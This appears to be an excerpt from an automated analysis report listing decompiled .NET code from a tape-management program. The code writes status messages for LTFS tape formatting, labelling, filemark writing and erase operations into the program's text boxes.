                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { "Write VOL1Label.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { "Write FileMark.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { "Write ltfslabel.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { "Write FileMark.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { "Write ltfsindex.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { "Write FileMark.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(CS_0024_003C_003E8__locals0._0024VB_0024NonLocal__0024VB_0024Closure_2._0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { $"WRITE ATTRIBUTE: Written time={CS_0024_003C_003E8__locals0._0024VB_0024Local_CurrentTime}.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { "WRITE ATTRIBUTE: VCI.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { "Format finished." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(CS_0024_003C_003E8__locals1._0024VB_0024NonLocal__0024VB_0024Closure_3._0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { CS_0024_003C_003E8__locals1._0024VB_0024Local_ex.ToString() + "\r\n" }, (string[])null, (Type[])null, (bool[])null, true);NewLateBinding.LateCall(CS_0024_003C_003E8__locals1._0024VB_0024NonLocal__0024VB_0024Closure_3._0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { "Format failed." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateSetComplex(_0024VB_0024Me.Panel1, (Type)null, "Enabled", new object[1] { true }, (string[])null, (Type[])null, false, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateSet(_0024VB_0024Me.TextBox8, (Type)null, "Text", new object[1] { "Filemark written." }, (string[])null, (Type[])null);NewLateBinding.LateSetComplex(_0024VB_0024Me.Panel1, (Type)null, "Enabled", new object[1] { true }, (string[])null, (Type[])null, false, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateSet(_0024VB_0024Me.TextBox8, (Type)null, "Text", new object[1] { $"Writing: {_0024VB_0024Local_fname}" }, (string[])null, (Type[])null);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateSet(_0024VB_0024Me.TextBox8, (Type)null, "Text", new object[1] { $"Write finished: {_0024VB_0024Local_fname}" }, (string[])null, (Type[])null);NewLateBinding.LateSetComplex(_0024VB_0024Me.Panel1, (Type)null, "Enabled", new object[1] { true }, (string[])null, (Type[])null, false, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(NewLateBinding.LateGet(ComboBox2, (Type)null, "ComboBox2", new object[0], (string[])null, (Type[])null, (bool[])null), (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateSet(TextBox8, (Type)null, "Text", new object[1] { "DataBuffer\r\n" }, (string[])null, (Type[])null);object textBox4 = TextBox8;NewLateBinding.LateSet(textBox4, (Type)null, "Text", new object[1] { Operators.ConcatenateObject(NewLateBinding.LateGet(textBox4, (Type)null, "Text", new object[0], (string[])null, (Type[])null, (bool[])null), (object)k2(array2, d0: true)) }, (string[])null, (Type[])null);textBox4 = TextBox8;NewLateBinding.LateSet(textBox4, (Type)null, "Text", new object[1] { Operators.ConcatenateObject(NewLateBinding.LateGet(textBox4, (Type)null, "Text", new object[0], (string[])null, (Type[])null, (bool[])null), (object)"\r\n\r\nSenseBuffer\r\n") }, (string[])null, (Type[])null);textBox4 = TextBox8;NewLateBinding.LateSet(textBox4, (Type)null, "Text", new object[1] { Operators.ConcatenateObject(NewLateBinding.LateGet(textBox4, (Type)null, "Text", new object[0], (string[])null, (Type[])null, (bool[])null), (object)(k2(array3) + "\r\n")) }, (string[])null, (Type[])null);textBox4 = TextBox8;object obj4 = textBox4;object[] array6 = new object[1];object obj5 = NewLateBinding.LateGet(textBox4, (Type)null, "Text", new object[0], (string[])null, (Type[])null, (bool[])null);object obj6 = TapeUtils;object[] obj7 = new object[1] { array3 };object[] array7 = obj7;bool[] obj8 = new bool[1] { true };bool[] array8 = obj8;object obj9 = NewLateBinding.LateGet(obj6, (Type)null, "ParseSenseData", obj7, (string[])null, (Type[])null, obj8);if (array8[0]){array3 = (byte[])Conversions.ChangeType(RuntimeHelpers.GetObjectValue(array7[0]), typeof(byte[]));}array6[0] = Operators.ConcatenateObject(obj5, Operators.ConcatenateObject(obj9, (object)"\r\n"));NewLateBinding.LateSet(obj4, (Type)null, "Text", array6, (string[])null, (Type[])null);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(NewLateBinding.LateGet(ComboBox2, (Type)null, "ComboBox2", new object[0], (string[])null, (Type[])null, (bool[])null), (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{object textBox3 = TextBox8;NewLateBinding.LateSet(textBox3, (Type)null, "Text", new object[1] { Operators.ConcatenateObject(NewLateBinding.LateGet(textBox3, (Type)null, "Text", new object[0], (string[])null, (Type[])null, (bool[])null), (object)"\r\nOK") }, (string[])null, (Type[])null);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(NewLateBinding.LateGet(ComboBox2, (Type)null, "ComboBox2", new object[0], (string[])null, (Type[])null, (bool[])null), (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{object textBox2 = TextBox8;NewLateBinding.LateSet(textBox2, (Type)null, "Text", new object[1] { Operators.ConcatenateObject(NewLateBinding.LateGet(textBox2, (Type)null, "Text", new object[0], (string[])null, (Type[])null, (bool[])null), (object)"\r\nFAIL") }, (string[])null, (Type[])null);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(NewLateBinding.LateGet(ComboBox2, (Type)null, "ComboBox2", new object[0], (string[])null, (Type[])null, (bool[])null), (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateSet(Panel2, (Type)null, "Enabled", new object[1] { true }, (string[])null, (Type[])null);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(NewLateBinding.LateGet(ComboBox2, (Type)null, "ComboBox2", new object[0], (string[])null, (Type[])null, (bool[])null), (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{if (Operators.CompareString(text, "", false) == 0){text = Conversions.ToString(Operators.ConcatenateObject(Operators.ConcatenateObject((object)"TAPE", NewLateBinding.LateGet(objectValue, (Type)null, "DevIndex", new object[0], (string[])null, (Type[])null, (bool[])null)), (object)" loaded (unthread)"));}text += "\r\n";object[] array3;bool[] array4;NewLateBinding.LateCall(TextBox2, (Type)null, "AppendText", array3 = new object[1] { text }, (string[])null, (Type[])null, array4 = new bool[1] { true }, true);if (array4[0]){text = (string)Conversions.ChangeType(RuntimeHelpers.GetObjectValue(array3[0]), typeof(string));}}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(NewLateBinding.LateGet(ComboBox3, (Type)null, "ComboBox2", new object[0], (string[])null, (Type[])null, (bool[])null), (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateSetComplex(Panel1, (Type)null, "Enabled", new object[1] { true }, (string[])null, (Type[])null, false, true);Nj(Conversions.ToBoolean(NewLateBinding.LateGet(CheckBox3, (Type)null, "Checked", new object[0], (string[])null, (Type[])null, (bool[])null)));}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(NewLateBinding.LateGet(ComboBox1, (Type)null, "ComboBox2", new object[0], (string[])null, (Type[])null, (bool[])null), (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{if (Operators.CompareString(text, "", false) == 0){text = Conversions.ToString(Operators.ConcatenateObject(Operators.ConcatenateObject((object)"TAPE", NewLateBinding.LateGet(objectValue, (Type)null, "DevIndex", new object[0], (string[])null, (Type[])null, (bool[])null)), (object)" unthreaded"));}text += "\r\n";object[] array3;bool[] array4;NewLateBinding.LateCall(TextBox2, (Type)null, "AppendText", array3 = new object[1] { text }, (string[])null, (Type[])null, array4 = new bool[1] { true }, true);if (array4[0]){text = (string)Conversions.ChangeType(RuntimeHelpers.GetObjectValue(array3[0]), typeof(string));}}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(NewLateBinding.LateGet(ComboBox2, (Type)null, "ComboBox2", new object[0], (string[])null, (Type[])null, (bool[])null), (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateSetComplex(Panel1, (Type)null, "Enabled", new object[1] { true }, (string[])null, (Type[])null, false, true);Nj(Conversions.ToBoolean(NewLateBinding.LateGet(CheckBox3, (Type)null, "Checked", new object[0], (string[])null, (Type[])null, (bool[])null)));}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateSet(TextBox8, (Type)null, "Text", new object[1] { "Start erase ...\r\n" }, (string[])null, (Type[])null);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { "Loading.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { "MODE SENSE" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(CS_0024_003C_003E8__locals0._0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { string.Format(" Mode Data: {0}{1}", k2(CS_0024_003C_003E8__locals0._0024VB_0024Local_ModeData), "\r\n") }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { "MODE SELECT - Partition mode page.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
